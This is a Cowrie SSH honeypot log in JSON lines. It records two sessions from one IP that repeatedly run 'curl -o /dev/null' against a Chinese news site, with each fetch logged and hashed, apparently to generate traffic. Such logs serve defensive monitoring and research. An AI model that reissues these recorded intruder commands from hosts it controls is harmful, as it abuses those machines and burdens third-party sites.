{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.884418Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.896258Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.937279Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.938755Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.942857Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.944057Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.949015Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.975525Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.988302Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.989753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:29.995062Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:29.996393Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.000757Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.007559Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.029867Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.035156Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.036508Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.044144Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.045358Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.069299Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.079973Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.081218Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.092351Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.093748Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.102418Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.103756Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.106040Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.128855Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.130275Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.138865Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.140425Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.145483Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.172188Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.176595Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.178189Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.188661Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.189925Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.222762Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.224142Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.227889Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.230913Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.235795Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.236923Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.261164Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.262222Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.281776Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.283527Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.316010Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.317239Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.327557Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.328759Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.356659Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.358014Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.367763Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.368832Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.391701Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.395189Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.396325Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.407589Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.409145Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.416011Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.433878Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.435243Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.451550Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.452762Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.474110Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.475632Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.492679Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.494091Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.511627Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.512825Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.517911Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.533833Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.535249Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.540646Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.542456Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.544212Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.554644Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.555733Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.567727Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.582927Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.584239Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.593462Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.595345Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.596729Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.622830Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.624198Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:30.632023Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.633098Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:30.676016Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
